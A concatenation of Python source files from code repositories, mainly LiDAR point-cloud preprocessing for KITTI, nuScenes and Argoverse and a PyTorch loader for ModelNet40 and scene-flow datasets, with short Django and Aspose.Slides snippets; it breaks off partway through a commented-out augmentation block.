tqdm(self.velodynes):\n print(pc_path)\n if not os.path.exists(os.path.join(self.save_path, self.seq)):\n os.mkdir(os.path.join(self.save_path, self.seq))\n if not os.path.exists(os.path.join(self.save_path, self.seq, \"velodyne\")):\n os.mkdir(os.path.join(self.save_path, self.seq, \"velodyne\"))\n save_path = os.path.join(self.save_path, self.seq, \"velodyne\", pc_path[-10:])\n print(save_path)\n pc_raw = np.fromfile(pc_path, dtype = np.float32, count = -1).reshape([-1, 4])\n\n # remove ego car, ground, and max_dist, max_height\n print(\"before rm\", pc_raw.shape[0])\n # rm_min_and_max_dist\n print(\"----rm_min_and_max_dist----\")\n dist_origin = np.sqrt(np.sum(pc_raw[:, :3] ** 2, axis = 1))\n keep = np.logical_and(self.min_dist <= dist_origin, dist_origin <= self.max_dist)\n pc_raw = pc_raw[keep]\n print(\"points_num\", pc_raw.shape[0])\n\n # rm max_height and ground\n print(\"----rm max_height and ground----\")\n indices, _ = my_ransac(pc_raw[:, :3])\n print(indices)\n pc_raw[indices] = self.max_height + 1\n pc_raw = pc_raw[pc_raw[:, 2] <= self.max_height]\n print(\"after rm\", pc_raw.shape)\n \n pc_raw.tofile(save_path)\n num = pc_raw.shape[0]\n if num < self.min_points:\n self.min_points = num\n if num > self.max_points:\n self.max_points = num\n\n self.max_height = max(np.max(pc_raw[:, 2]), self.max_height)\n self.min_height = min(np.min(pc_raw[:, 2]), self.min_height)\n\n print(\"points num: [\", self.min_points, \",\", self.max_points, \"]\")\n print(\"points height: [\", self.min_height, \",\", self.max_height, \"]\")\n return\n\n\nclass PreprocessNonlinear:\n def __init__(self, root, scene_dir, save_path, remove = False, min_dist = 3.0, max_dist = 80.0, min_height = -5.0, max_height = 5.0):\n self.root = root\n self.scene_dir = scene_dir\n self.save_path = save_path\n self.remove = remove\n self.min_dist = min_dist\n self.max_dist = max_dist\n self.min_height = min_height\n self.max_height = max_height\n self.velodynes = self.read_sample_velodyne() \n self.max_for_dataset = 0\n self.max_x = 0\n self.max_y = 0\n self.max_z = 0\n \n \n def read_sample_velodyne(self):\n scene_list = glob.glob(os.path.join(self.scene_dir, '*.txt'))\n scene_list = sorted(scene_list)\n velo_list = []\n for scene in scene_list:\n with open(scene, 'r') as f:\n for line in f.readlines():\n line = line.strip('\\n').split(' ')\n velo_list.append(line)\n return velo_list # [nsample, 4+interval-1]\n \n def normalize(self, pc, max_for_dataset):\n l = pc.shape[0]\n centroid = np.mean(pc, axis=0)\n pc = pc - centroid\n m = max_for_dataset\n pc = pc / m\n return pc\n\n def rm_range(self, pc_raw, min_dist, max_dist, min_height, max_height):\n dist_origin = np.sqrt(np.sum(pc_raw[:, :3] ** 2, axis = 1))\n keep = np.logical_and(min_dist <= dist_origin, dist_origin <= max_dist)\n pc_raw = pc_raw[keep]\n pc_raw = pc_raw[pc_raw[:, 2] <= max_height]\n pc_raw = pc_raw[pc_raw[:, 2] >= min_height]\n return pc_raw\n\n\n def save_processed_kitti(self):\n count = 0\n p = set()\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n name = '_'.join([self.velodynes[i][j].split('/')[-3], self.velodynes[i][j].split('/')[-1]])\n p.add(name)\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n pc_path = os.path.join(self.root, self.velodynes[i][j])\n print(pc_path)\n name = '_'.join([self.velodynes[i][j].split('/')[-3], self.velodynes[i][j].split('/')[-1]])\n print(name)\n if not os.path.exists(self.save_path):\n os.mkdir(self.save_path)\n save_path = 
os.path.join(self.save_path, name)\n print(save_path)\n\n pc_raw = np.fromfile(pc_path, dtype = np.float32, count = -1).reshape([-1, 4])[:, :3]\n print(\"==pc_raw==\", pc_raw.shape)\n print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n pc_raw = self.rm_range(pc_raw, self.min_dist, self.max_dist, self.min_height, self.max_height)\n pc_raw = np.array(pc_raw, dtype=np.float32)\n print(\"==max_dist==\", self.max_dist, \"|| pc_rm:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n self.max_for_dataset = max(np.max(np.abs(pc_raw)).item(), self.max_for_dataset)\n self.max_x = max(np.max(np.abs(pc_raw[:, 0])).item(), self.max_x)\n self.max_y = max(np.max(np.abs(pc_raw[:, 1])).item(), self.max_y)\n self.max_z = max(np.max(np.abs(pc_raw[:, 2])).item(), self.max_z)\n\n if self.remove:\n # rm ground\n print(\"----rm ground----\")\n pc_raw = pc_raw[pc_raw[:, 2] >= -1.4] \n print(\"==rm ground==\" \"pc_rm_ground:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n # print(\"pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n # print(pc_raw.shape)\n # pc_raw = self.normalize(pc_raw, max_for_dataset=81.15216827392578)\n # print(\"norm_pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n if not os.path.isfile(save_path):\n count += 1\n pc_raw.tofile(save_path)\n \n names_txt_path = os.path.join(self.save_path, \"scene_list\")\n if not os.path.exists(names_txt_path):\n os.mkdir(names_txt_path)\n with open(os.path.join(names_txt_path, \"scene_list.txt\"), 'a') as f:\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])-1):\n name = '_'.join([self.velodynes[i][j].split('/')[-3], self.velodynes[i][j].split('/')[-1]])\n f.write(name + ' ')\n name = '_'.join([self.velodynes[i][-1].split('/')[-3], self.velodynes[i][-1].split('/')[-1]])\n f.write(name + '\\n')\n print(\"====dataset range====\")\n print(\"max_for_kitti: \", self.max_for_dataset)\n print(\"max_x for kitti:\", self.max_x)\n print(\"max_y for kitti:\", self.max_y)\n print(\"max_z for kitti:\", self.max_z)\n print(\"file to write: \", count)\n print(\"file should be written: \", len(p))\n assert len(p) == count\n\n\n def save_processed_nuscenes(self):\n count = 0\n p = set()\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n name = self.velodynes[i][j].split('/')[-1]\n p.add(name)\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n pc_path = os.path.join(self.root, self.velodynes[i][j])\n print(pc_path)\n name = self.velodynes[i][j].split('/')[-1]\n save_path = os.path.join(self.save_path, name)\n print(save_path)\n pc_raw = np.fromfile(pc_path, dtype = 
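            # nuScenes LIDAR_TOP sweeps are flat float32 records of
            # (x, y, z, intensity, ring_index), which is why the buffer is
            # reshaped to 5 columns below whenever its length divides evenly by 5.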
np.float32, count = -1)\n if not pc_raw.shape[0] % 5:\n pc_raw = pc_raw.reshape(-1, 5)[:, :3]\n else:\n pc_raw = pc_raw.reshape(-1, 4)[:, :3]\n # print(pc_raw.shape)\n pc_raw = np.array(pc_raw, dtype=np.float32)\n print(\"==pc_raw==\", pc_raw.shape)\n print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n pc_raw = self.rm_range(pc_raw, self.min_dist, self.max_dist, self.min_height, self.max_height)\n print(\"==max_dist==\", self.max_dist, \"|| pc_rm:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n self.max_for_dataset = max(np.max(np.abs(pc_raw)).item(), self.max_for_dataset)\n self.max_x = max(np.max(np.abs(pc_raw[:, 0])).item(), self.max_x)\n self.max_y = max(np.max(np.abs(pc_raw[:, 1])).item(), self.max_y)\n self.max_z = max(np.max(np.abs(pc_raw[:, 2])).item(), self.max_z)\n\n\n if self.remove:\n # rm ground\n print(\"----rm ground----\")\n indices, _ = my_ransac(pc_raw)\n pc_raw[indices] = self.max_height + 1\n pc_raw = pc_raw[pc_raw[:, 2] <= self.max_height] \n print(\"==rm ground==\" \"pc_rm_ground:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n # print(\"pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n # print(pc_raw.shape)\n # pc_raw = self.normalize(pc_raw, max_for_dataset = 105.2951431274414)\n # print(\"norm_pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n if not os.path.isfile(save_path):\n count += 1\n pc_raw.tofile(save_path)\n \n names_txt_path = os.path.join(self.save_path, \"scene_list\")\n if not os.path.exists(names_txt_path):\n os.mkdir(names_txt_path)\n with open(os.path.join(names_txt_path, \"scene_list.txt\"), 'a') as f:\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0]) - 1):\n name = self.velodynes[i][j].split('/')[-1]\n f.write(name + ' ')\n name = self.velodynes[i][-1].split('/')[-1]\n f.write(name + '\\n')\n print(\"max_for_nscs: \", self.max_for_dataset)\n print(\"max_x for nscs:\", self.max_x)\n print(\"max_y for nscs:\", self.max_y)\n print(\"max_z for nscs:\", self.max_z)\n print(\"file to write: \", count)\n print(\"file should be written:\", len(p))\n assert len(p) == count\n \n\n def save_processed_argos(self):\n count = 0\n p = set()\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n name = self.velodynes[i][j].split('/')[-1]\n name = name.split('.')[0]\n p.add(name)\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n pc_path = os.path.join(self.root, self.velodynes[i][j])\n print(pc_path)\n name = self.velodynes[i][j].split('/')[-1]\n name = name.split('.')[0]\n save_path = os.path.join(self.save_path, name + '.bin')\n print(save_path)\n 
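# NOTE (editorial sketch, not part of the original pipeline): io_utils is assumed to\n # be the Argoverse devkit's lidar loader, returning an (N, 3) float array of xyz\n # points for the sweep at pc_path. A hypothetical open3d-based fallback for .ply\n # sweeps, if that dependency were unavailable, could look like:\n # import open3d as o3d\n # pc_raw = np.asarray(o3d.io.read_point_cloud(pc_path).points, dtype=np.float32)\n 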
pc_raw = io_utils.read_lidar_sweep(pc_path, attrib_spec=\"xyz\")\n # print(\"pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n pc_raw = pc_raw.reshape(-1, 3)\n # ar = np.ones((pc_raw.shape[0], 1))\n # pc_raw = np.hstack((pc_raw, ar)) \n pc_raw = np.array(pc_raw, dtype=np.float32)\n print(\"==pc_raw==\", pc_raw.shape)\n print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n \n pc_raw = self.rm_range(pc_raw, self.min_dist, self.max_dist, self.min_height, self.max_height)\n pc_raw = np.array(pc_raw, dtype=np.float32)\n print(\"==max_dist==\", self.max_dist, \"|| pc_rm:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n self.max_for_dataset = max(np.max(np.abs(pc_raw)).item(), self.max_for_dataset)\n self.max_x = max(np.max(np.abs(pc_raw[:, 0])).item(), self.max_x)\n self.max_y = max(np.max(np.abs(pc_raw[:, 1])).item(), self.max_y)\n self.max_z = max(np.max(np.abs(pc_raw[:, 2])).item(), self.max_z)\n\n if self.remove:\n # rm ground\n print(\"----rm ground----\")\n indices, _ = my_ransac(pc_raw)\n pc_raw[indices] = self.max_height + 1\n pc_raw = pc_raw[pc_raw[:, 2] <= self.max_height] \n print(\"==rm ground==\" \"pc_rm_ground:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n # print(\"pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n # print(\"pc_raw i range:\", np.min(pc_raw[:, 3]), np.max(pc_raw[:, 3]))\n # print(pc_raw.shape)\n # pc_raw = self.normalize(pc_raw, max_for_dataset=228.75)\n # print(\"norm_pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n # print(pc_raw.shape)\n if not os.path.isfile(save_path):\n count += 1\n pc_raw.tofile(save_path)\n \n names_txt_path = os.path.join(self.save_path, \"scene_list\")\n if not os.path.exists(names_txt_path):\n os.mkdir(names_txt_path)\n with open(os.path.join(names_txt_path, \"scene_list.txt\"), 'a') as f:\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])-1):\n name = self.velodynes[i][j].split('/')[-1]\n name = name.split('.')[0]\n f.write(name + '.bin ')\n name = self.velodynes[i][-1].split('/')[-1]\n name = name.split('.')[0]\n f.write(name + '.bin' + '\\n')\n print(\"max_for_argos: \", self.max_for_dataset)\n print(\"max_x for argos:\", self.max_x)\n print(\"max_y for argos:\", self.max_y)\n print(\"max_z for argos:\", self.max_z)\n print(\"file to write: \", count)\n print(\"file should be written:\", len(p))\n assert len(p) == count\n\n\n\nif __name__ == \"__main__\":\n args = parse_arg()\n # processor = 
PreprocessNuscenes(args.root, args.save_path, args.scenes_list, args.min_dist, args.max_dist, args.max_height)\n # processor = PreprocessKitti(args.root, args.save_path, \"00\")\n \n # this part is to deal with kitti subdataset\n if args.dataset == 'kitti':\n processor = PreprocessNonlinear(args.root, args.scenes_list ,args.save_path, remove = args.remove)\n processor.save_processed_kitti()\n\n # this part is to deal with nuscenes subdataset\n elif args.dataset == 'nscs':\n processor = PreprocessNonlinear(args.root, args.scenes_list ,args.save_path, remove = args.remove)\n processor.save_processed_nuscenes()\n\n # this part is to deal with argos subdataset\n elif args.dataset == 'argos':\n processor = PreprocessNonlinear(args.root, args.scenes_list ,args.save_path, remove = args.remove)\n processor.save_processed_argos()","repo_name":"ispc-lab/NeuralPCI","sub_path":"data/preprocess_dataset.py","file_name":"preprocess_dataset.py","file_ext":"py","file_size_in_byte":28822,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"714981407","text":"from django.core.management.base import BaseCommand, CommandParser\nfrom data.models import FinvizDataFile\n\nclass Command(BaseCommand): \n\n def handle(self, *args, **options):\n try:\n FinvizDataFile.create_finviz_data_automatically()\n except Exception as e:\n print(e)\n","repo_name":"erfanpsss/StockTradingBot","sub_path":"data/management/commands/get_finviz_data.py","file_name":"get_finviz_data.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36641467477","text":"import aspose.slides as slides\n\n\n#ExStart:AssistantNode\n# The path to the documents directory.\ndataDir = \"./examples/data/\"\noutDir = \"./examples/out/\"\n\n# Creating a presentation instance\nwith slides.Presentation(dataDir + \"smart_art_access.pptx\") as pres:\n # Traverse through every shape inside first slide\n for shape in pres.slides[0].shapes:\n \n # Check if shape is of SmartArt type\n if type(shape) is slides.smartart.SmartArt:\n \n # Traversing through all nodes of SmartArt shape\n for node in shape.all_nodes:\n \n tc = node.text_frame.text\n # Check if node is Assitant node\n if node.is_assistant:\n \n # Setting Assitant node to False and making it normal node\n node.is_assistant = False\n \n \n \n \n # Save Presentation\n pres.save(outDir + \"smart_art_change_assitant_out.pptx\", slides.export.SaveFormat.PPTX)\n\n#ExEnd:AssistantNode","repo_name":"aspose-slides/Aspose.Slides-for-Python-via-.NET","sub_path":"examples/src/SmartArts/AssistantNode.py","file_name":"AssistantNode.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1919560714","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport random\nimport sys\nimport glob\nimport h5py\nimport numpy as np\nfrom scipy.spatial.transform import Rotation\nfrom torch.utils.data import Dataset\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.spatial.distance import minkowski\nimport open3d as o3d\nimport augmentation as t\n\n\n# Part of the code is referred from: https://github.com/charlesq34/pointnet\n\ndef download():\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n DATA_DIR = os.path.join(BASE_DIR, 'data')\n if not os.path.exists(DATA_DIR):\n os.mkdir(DATA_DIR)\n if not os.path.exists(os.path.join(DATA_DIR, 
'modelnet40_ply_hdf5_2048')):\n www = 'https://shapenet.cs.stanford.edu/media/modelnet40_ply_hdf5_2048.zip'\n zipfile = os.path.basename(www)\n os.system('wget %s; unzip %s' % (www, zipfile))\n os.system('mv %s %s' % (zipfile[:-4], DATA_DIR))\n os.system('rm %s' % (zipfile))\n\n\ndef load_data(partition):\n # download()\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n DATA_DIR = os.path.join(BASE_DIR, 'dataset/')\n all_data = []\n all_label = []\n for h5_name in glob.glob(os.path.join(DATA_DIR, 'modelnet40_ply_hdf5_2048', 'ply_data_%s*.h5' % partition)):\n f = h5py.File(h5_name)\n data = f['data'][:].astype('float32')\n label = f['label'][:].astype('int64')\n f.close()\n all_data.append(data)\n all_label.append(label)\n all_data = np.concatenate(all_data, axis=0)\n all_label = np.concatenate(all_label, axis=0)\n return all_data, all_label\n\n\ndef translate_pointcloud(pointcloud):\n xyz1 = np.random.uniform(low=2. / 3., high=3. / 2., size=[3])\n xyz2 = np.random.uniform(low=-0.2, high=0.2, size=[3])\n\n translated_pointcloud = np.add(np.multiply(pointcloud, xyz1), xyz2).astype('float32')\n return translated_pointcloud\n\n\ndef jitter_pointcloud(pointcloud, sigma=0.01, clip=0.05):\n N, C = pointcloud.shape\n pointcloud += np.clip(sigma * np.random.randn(N, C), -1 * clip, clip)\n return pointcloud\n\n\ndef farthest_subsample_points(pointcloud1, pointcloud2, num_subsampled_points=768):\n pointcloud1 = pointcloud1.T\n pointcloud2 = pointcloud2.T\n num_points = pointcloud1.shape[0]\n nbrs1 = NearestNeighbors(n_neighbors=num_subsampled_points, algorithm='auto',\n metric=lambda x, y: minkowski(x, y), n_jobs=1).fit(pointcloud1)\n random_p1 = np.random.random(size=(1, 3)) + np.array([[500, 500, 500]]) * np.random.choice([1, -1, 1, -1])\n idx1 = nbrs1.kneighbors(random_p1, return_distance=False).reshape((num_subsampled_points,))\n nbrs2 = NearestNeighbors(n_neighbors=num_subsampled_points, algorithm='auto',\n metric=lambda x, y: minkowski(x, y), n_jobs=1).fit(pointcloud2)\n random_p2 = random_p1 #np.random.random(size=(1, 3)) + np.array([[500, 500, 500]]) * np.random.choice([1, -1, 2, -2])\n idx2 = nbrs2.kneighbors(random_p2, return_distance=False).reshape((num_subsampled_points,))\n return pointcloud1[idx1, :].T, pointcloud2[idx2, :].T\n\n\nclass ModelNet40(Dataset):\n def __init__(self, num_points, num_subsampled_points = 768, partition='train', gaussian_noise=False, unseen=False, factor=4):\n self.data, self.label = load_data(partition)\n self.num_points = num_points\n self.partition = partition\n self.gaussian_noise = gaussian_noise\n self.unseen = unseen\n self.label = self.label.squeeze()\n self.factor = factor\n self.num_subsampled_points = num_subsampled_points\n if num_points != num_subsampled_points:\n self.subsampled = True\n else:\n self.subsampled = False\n if self.unseen:\n ######## simulate testing on first 20 categories while training on last 20 categories\n if self.partition == 'test':\n self.data = self.data[self.label>=20]\n self.label = self.label[self.label>=20]\n elif self.partition == 'train':\n self.data = self.data[self.label<20]\n self.label = self.label[self.label<20]\n\n def __getitem__(self, item):\n pointcloud = self.data[item][:self.num_points]\n # if self.gaussian_noise:\n # pointcloud = jitter_pointcloud(pointcloud)\n if self.partition != 'train':\n np.random.seed(item)\n anglex = np.random.uniform() * np.pi / self.factor\n angley = np.random.uniform() * np.pi / self.factor\n anglez = np.random.uniform() * np.pi / self.factor\n\n cosx = np.cos(anglex)\n cosy 
= np.cos(angley)\n cosz = np.cos(anglez)\n sinx = np.sin(anglex)\n siny = np.sin(angley)\n sinz = np.sin(anglez)\n Rx = np.array([[1, 0, 0],\n [0, cosx, -sinx],\n [0, sinx, cosx]])\n Ry = np.array([[cosy, 0, siny],\n [0, 1, 0],\n [-siny, 0, cosy]])\n Rz = np.array([[cosz, -sinz, 0],\n [sinz, cosz, 0],\n [0, 0, 1]])\n # 生成旋转矩阵\n R_ab = Rx.dot(Ry).dot(Rz)\n R_ba = R_ab.T\n # 生成平移向量\n translation_ab = np.array([np.random.uniform(-0.5, 0.5), np.random.uniform(-0.5, 0.5),\n np.random.uniform(-0.5, 0.5)])\n translation_ba = -R_ba.dot(translation_ab)\n\n pointcloud1 = pointcloud.T\n rotation_ab = Rotation.from_euler('zyx', [anglez, angley, anglex])\n pointcloud2 = rotation_ab.apply(pointcloud1.T).T + np.expand_dims(translation_ab, axis=1)\n\n euler_ab = np.asarray([anglez, angley, anglex])\n euler_ba = -euler_ab[::-1]\n\n pointcloud1 = np.random.permutation(pointcloud1.T).T\n pointcloud2 = np.random.permutation(pointcloud2.T).T\n\n if self.gaussian_noise:\n pointcloud1 = jitter_pointcloud(pointcloud1)\n pointcloud2 = jitter_pointcloud(pointcloud2)\n\n if self.subsampled:\n pointcloud1, pointcloud2 = farthest_subsample_points(pointcloud1, pointcloud2,\n num_subsampled_points=self.num_subsampled_points)\n\n return pointcloud1.astype('float32'), pointcloud2.astype('float32'), R_ab.astype('float32'), \\\n translation_ab.astype('float32'), R_ba.astype('float32'), translation_ba.astype('float32'), \\\n euler_ab.astype('float32'), euler_ba.astype('float32')\n\n def __len__(self):\n return self.data.shape[0]\n\n\nclass SceneflowDataset(Dataset):\n ELASTIC_DISTORT_PARAMS = ((0.2, 0.4), (0.8, 1.6))\n ROTATION_AXIS = 'z'\n\n def __init__(self, args, partition='train'):\n self.npoints = args.num_points\n self.partition = partition\n self.root = args.dataset_path\n if self.partition=='train':\n self.datapath = glob.glob(os.path.join(self.root, 'TRAIN*.npz'))\n else:\n self.datapath = glob.glob(os.path.join(self.root, 'TEST*.npz'))\n self.cache = {}\n self.cache_size = 30000\n self.flow_aug = args.flow_aug\n self.use_color = args.use_color\n self.flow_aug_type = args.flow_aug_type\n self.use_aug = args.use_aug\n\n if self.use_aug:\n input_transform = t.Compose([\n t.ElasticDistortion(self.ELASTIC_DISTORT_PARAMS),\n t.RandomHorizontalFlip(self.ROTATION_AXIS, is_temporal=False),\n ])\n self.aug = t.Compose([input_transform])\n\n ###### deal with one bad datapoint with nan value\n self.datapath = [d for d in self.datapath if 'TRAIN_C_0140_left_0006-0' not in d]\n ######\n print(self.partition, ': ',len(self.datapath))\n\n def __getitem__(self, index):\n if index in self.cache:\n pos1, pos2, color1, color2, flow, mask1 = self.cache[index]\n else:\n fn = self.datapath[index]\n with open(fn, 'rb') as fp:\n data = np.load(fp)\n pos1 = data['points1'].astype('float32')\n pos2 = data['points2'].astype('float32')\n color1 = data['color1'].astype('float32')\n color2 = data['color2'].astype('float32')\n flow = data['flow'].astype('float32')\n mask1 = data['valid_mask1']\n\n if len(self.cache) < self.cache_size:\n self.cache[index] = (pos1, pos2, color1, color2, flow, mask1)\n\n if self.partition == 'train':\n n1 = pos1.shape[0]\n sample_idx1 = np.random.choice(n1, self.npoints, replace=False)\n n2 = pos2.shape[0]\n sample_idx2 = np.random.choice(n2, self.npoints, replace=False)\n\n pos1 = pos1[sample_idx1, :]\n pos2 = pos2[sample_idx2, :]\n color1 = color1[sample_idx1, :]\n color2 = color2[sample_idx2, :]\n flow = flow[sample_idx1, :]\n mask1 = mask1[sample_idx1]\n else:\n pos1 = pos1[:self.npoints, :]\n pos2 = 
pos2[:self.npoints, :]\n color1 = color1[:self.npoints, :]\n color2 = color2[:self.npoints, :]\n flow = flow[:self.npoints, :]\n mask1 = mask1[:self.npoints]\n\n if not self.use_color:\n color1 = np.zeros_like(color1)\n color2 = np.zeros_like(color2)\n\n if self.use_aug and self.partition == 'train':\n pos1, flow = self.aug(pos1, flow)\n\n pos1_center = np.mean(pos1, 0)\n pos1 -= pos1_center\n pos2 -= pos1_center\n\n return pos1, pos2, color1, color2, flow, mask1\n # if self.partition == 'train' and self.flow_aug:\n # if random.random() <= 0.5:\n # return pos1, pos2, color1, color2, flow, mask1\n # else:\n # # The augmentation\n # # select 2 random points\n # idx_knn = np.random.choice(self.npoints, 5, replace=False)\n # # create open3d kdtree\n # pcd = o3d.geometry.PointCloud()\n # pcd.points = o3d.utility.Vector3dVector(pos1)\n # kdtree = o3d.geometry.KDTreeFlann(pcd)\n #\n # if self.flow_aug_type == 'random':\n # # find the nearest neighbor of the 2 random points\n # # max flow min flow\n # max_flow_x = np.max(flow[:, 0])\n # min_flow_x = np.min(flow[:, 0])\n # max_flow_y = np.max(flow[:, 1])\n # min_flow_y = np.min(flow[:, 1])\n # max_flow_z = np.max(flow[:, 2])\n # min_flow_z = np.min(flow[:, 2])\n # for i in range(5):\n # [_, idx, _] = kdtree.search_radius_vector_3d(pos1[idx_knn[i], :], 0.5)\n # idx = np.array(idx)\n # # create random x, y, z flows between min and max\n # flow_x = np.random.uniform(min_flow_x, max_flow_x, idx.shape[0])\n # flow_y = np.random.uniform(min_flow_y, max_flow_y, idx.shape[0])\n # flow_z = np.random.uniform(min_flow_z, max_flow_z, idx.shape[0])\n # flow_idx_augmented = np.zeros((idx.shape[0], 3))\n # flow_idx_augmented[:, 0] = flow_x\n # flow_idx_augmented[:, 1] = flow_y\n # flow_idx_augmented[:, 2] = flow_z\n # flow[idx[0:], :] = flow_idx_augmented\n # pos2 = pos1 + flow\n # color2 = color1\n # mask1 = np.ones_like(mask1)\n # return pos1, pos2, color1, color2, flow, mask1\n #\n # elif self.flow_aug_type == 'replace':\n # for i in range(5):\n # [_, idx, _] = kdtree.search_radius_vector_3d(pos1[idx_knn[i], :], 0.5)\n # idx = np.array(idx)\n # if idx.shape[0] == 0:\n # continue\n # random_index = random.randint(0, self.__len__() - 1)\n # if random_index in self.cache:\n # pos1_random, pos2_random, color1_random, color2_random, flow_random, mask1_random = self.cache[random_index]\n # else:\n # fn_random = self.datapath[random_index]\n # with open(fn_random, 'rb') as fp_random:\n # data_random = np.load(fp_random)\n # pos1_random = data_random['points1'].astype('float32')\n # pos2_random = data_random['points2'].astype('float32')\n # color1_random = data_random['color1'].astype('float32')\n # color2_random = data_random['color2'].astype('float32')\n # flow_random = data_random['flow'].astype('float32')\n # mask1_random = data_random['valid_mask1']\n #\n # if not self.use_color:\n # color1_random = np.zeros_like(color1_random)\n # color2_random = np.zeros_like(color2_random)\n #\n # pcd_random = o3d.geometry.PointCloud()\n # pcd_random.points = o3d.utility.Vector3dVector(pos1_random)\n # kdtree_random = o3d.geometry.KDTreeFlann(pcd_random)\n # random_point = np.random.choice(pos1_random.shape[0], 1, replace=False)\n # [_, idx_random, _] = 